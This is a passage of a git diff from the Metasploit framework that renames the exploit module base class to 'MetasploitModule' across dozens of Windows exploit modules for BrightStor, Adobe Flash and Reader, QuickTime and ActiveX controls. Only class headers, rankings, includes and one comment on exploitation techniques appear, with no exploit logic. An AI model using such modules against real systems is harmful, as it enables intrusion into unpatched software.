b/modules/exploits/windows/brightstor/hsmserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver.rb b/modules/exploits/windows/brightstor/lgserver.rb index d439f85cc8..11017fc1d8 100644 --- a/modules/exploits/windows/brightstor/lgserver.rb +++ b/modules/exploits/windows/brightstor/lgserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_multi.rb b/modules/exploits/windows/brightstor/lgserver_multi.rb index 6f6bda88cd..6aadbd1579 100644 --- a/modules/exploits/windows/brightstor/lgserver_multi.rb +++ b/modules/exploits/windows/brightstor/lgserver_multi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb index a54686a117..307a6d1eb0 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxrlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb index bbbd6376ee..9af29f1237 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb index e12c6efa64..8f464578f1 100644 --- a/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb +++ b/modules/exploits/windows/brightstor/lgserver_rxsuselicenseini.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/license_gcr.rb b/modules/exploits/windows/brightstor/license_gcr.rb index 53b03d3d27..2e6634ae61 100644 --- a/modules/exploits/windows/brightstor/license_gcr.rb +++ b/modules/exploits/windows/brightstor/license_gcr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb index 6ea0c62537..f6a5fc70d8 100644 --- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb +++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/brightstor/message_engine.rb b/modules/exploits/windows/brightstor/message_engine.rb index af04cc4bf8..5f8c82ef4f 100644 --- a/modules/exploits/windows/brightstor/message_engine.rb +++ b/modules/exploits/windows/brightstor/message_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/message_engine_72.rb b/modules/exploits/windows/brightstor/message_engine_72.rb index f4ca613159..377f36c163 100644 --- a/modules/exploits/windows/brightstor/message_engine_72.rb +++ b/modules/exploits/windows/brightstor/message_engine_72.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/message_engine_heap.rb b/modules/exploits/windows/brightstor/message_engine_heap.rb index 5ba4ca46fb..0fe296dcb1 100644 --- a/modules/exploits/windows/brightstor/message_engine_heap.rb +++ b/modules/exploits/windows/brightstor/message_engine_heap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/sql_agent.rb b/modules/exploits/windows/brightstor/sql_agent.rb index 2785745edc..6c485b64f0 100644 --- a/modules/exploits/windows/brightstor/sql_agent.rb +++ b/modules/exploits/windows/brightstor/sql_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb index dc9da31f15..46702d30fd 100644 --- a/modules/exploits/windows/brightstor/tape_engine.rb +++ b/modules/exploits/windows/brightstor/tape_engine.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb index 6e55ba95b3..36c01eb3c3 100644 --- a/modules/exploits/windows/brightstor/tape_engine_0x8a.rb +++ b/modules/exploits/windows/brightstor/tape_engine_0x8a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/brightstor/universal_agent.rb b/modules/exploits/windows/brightstor/universal_agent.rb index 770d7c8fa9..4d157fe3e2 100644 --- a/modules/exploits/windows/brightstor/universal_agent.rb +++ b/modules/exploits/windows/brightstor/universal_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 2f18a7668a..39112c8f94 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index 2194a15c1e..20550092a5 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb index 57bc88f9aa..fc286ce6bd 100644 --- a/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb +++ b/modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb index 34dcd36cb9..0b3e808fbc 100644 --- a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb +++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb index 5b1fdf05f8..f6d45a1423 100644 --- a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index ac3e425873..7d18fb3de6 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 692e2be2fa..3e0b780952 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_otf_font.rb b/modules/exploits/windows/browser/adobe_flash_otf_font.rb index e1f1d0072b..4f831045aa 100644 --- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb +++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_pcre.rb b/modules/exploits/windows/browser/adobe_flash_pcre.rb index f000571844..9de4c02cc0 100644 --- a/modules/exploits/windows/browser/adobe_flash_pcre.rb +++ b/modules/exploits/windows/browser/adobe_flash_pcre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000' diff --git a/modules/exploits/windows/browser/adobe_flash_regex_value.rb b/modules/exploits/windows/browser/adobe_flash_regex_value.rb index 7cd4e5d44e..3d5fea3c40 100644 --- a/modules/exploits/windows/browser/adobe_flash_regex_value.rb +++ b/modules/exploits/windows/browser/adobe_flash_regex_value.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb index 89e33338e5..84bc9cf971 100644 --- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb +++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb index 8acbbb573a..b2d3ce686c 100644 --- a/modules/exploits/windows/browser/adobe_flash_sps.rb +++ b/modules/exploits/windows/browser/adobe_flash_sps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb index b4fa07267a..9111d09548 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uninitialized.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb index 5575afab8c..169eb46fca 100644 --- a/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb index b1af657d89..3c0a8c62b0 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb index 2fd3934e19..b20663ea80 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb index 3a7dcbd1c1..cab570badc 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb index d512e180d4..325a1669b1 100644 --- a/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb index bfcdff41d3..c806c3cb97 100644 --- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb index cf67c75243..b0c0e7dffc 100644 --- a/modules/exploits/windows/browser/adobe_geticon.rb +++ b/modules/exploits/windows/browser/adobe_geticon.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb index 92bece600b..8b26e8b882 100644 --- a/modules/exploits/windows/browser/adobe_jbig2decode.rb +++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index ab1bbc2970..61ffba6cb5 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb index 6d3843fb63..d27e4c3fdd 100644 --- a/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb +++ b/modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/adobe_toolbutton.rb b/modules/exploits/windows/browser/adobe_toolbutton.rb index 388c30fe6b..a417a07bf4 100644 --- a/modules/exploits/windows/browser/adobe_toolbutton.rb +++ b/modules/exploits/windows/browser/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb index 392d49790e..03a8c41b0d 100644 --- a/modules/exploits/windows/browser/adobe_utilprintf.rb +++ b/modules/exploits/windows/browser/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb index 1598534a4b..6e83a0298d 100644 --- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb +++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/aim_goaway.rb b/modules/exploits/windows/browser/aim_goaway.rb index cd7abc4965..e92dbac293 100644 --- a/modules/exploits/windows/browser/aim_goaway.rb +++ b/modules/exploits/windows/browser/aim_goaway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb index 8ed7b765ad..ab8329aab8 100644 --- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb +++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/amaya_bdo.rb b/modules/exploits/windows/browser/amaya_bdo.rb index 0ed7599111..61d9d87c34 100644 --- a/modules/exploits/windows/browser/amaya_bdo.rb +++ b/modules/exploits/windows/browser/amaya_bdo.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb index 618ceede6d..41de2bcd83 100644 --- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb +++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aol_icq_downloadagent.rb b/modules/exploits/windows/browser/aol_icq_downloadagent.rb index 6426521138..73c8fbc8df 100644 --- a/modules/exploits/windows/browser/aol_icq_downloadagent.rb +++ b/modules/exploits/windows/browser/aol_icq_downloadagent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_itunes_playlist.rb b/modules/exploits/windows/browser/apple_itunes_playlist.rb index 38e8c16c39..d34d0986cc 100644 --- a/modules/exploits/windows/browser/apple_itunes_playlist.rb +++ b/modules/exploits/windows/browser/apple_itunes_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 8907f6869c..7432c5f21f 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb index 69d6b8a164..da040e12fd 100644 --- a/modules/exploits/windows/browser/apple_quicktime_mime_type.rb +++ b/modules/exploits/windows/browser/apple_quicktime_mime_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb index fd94da6b32..c7f952df5b 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rdrf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 0a2cdaa1ed..14d8274cce 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index 2355aab342..0e8c2c5918 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # needs more testing/targets to be Great include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb index 6d58e6d12d..ec9ff0db78 100644 --- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb +++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ask_shortformat.rb b/modules/exploits/windows/browser/ask_shortformat.rb index f73ec53adf..fa0467d743 100644 --- a/modules/exploits/windows/browser/ask_shortformat.rb +++ b/modules/exploits/windows/browser/ask_shortformat.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb index 1bd56b231c..19c103ab84 100644 --- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb +++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/athocgov_completeinstallation.rb b/modules/exploits/windows/browser/athocgov_completeinstallation.rb index 695e939113..6f09ebd1d5 100644 --- a/modules/exploits/windows/browser/athocgov_completeinstallation.rb +++ b/modules/exploits/windows/browser/athocgov_completeinstallation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/autodesk_idrop.rb b/modules/exploits/windows/browser/autodesk_idrop.rb index 523b471db6..2084de912a 100644 --- a/modules/exploits/windows/browser/autodesk_idrop.rb +++ b/modules/exploits/windows/browser/autodesk_idrop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/aventail_epi_activex.rb b/modules/exploits/windows/browser/aventail_epi_activex.rb index a8e80a26fa..29a01fdafe 100644 --- a/modules/exploits/windows/browser/aventail_epi_activex.rb +++ b/modules/exploits/windows/browser/aventail_epi_activex.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # heap spray and address shifty include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb index 770403a7c7..e983150018 100644 --- a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -23,7 +23,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb index d0be485f04..c268856ee4 100644 --- a/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb +++ b/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb index 271caa3851..bb736f1946 100644 --- a/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb +++ b/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb @@ -5,7 +5,7 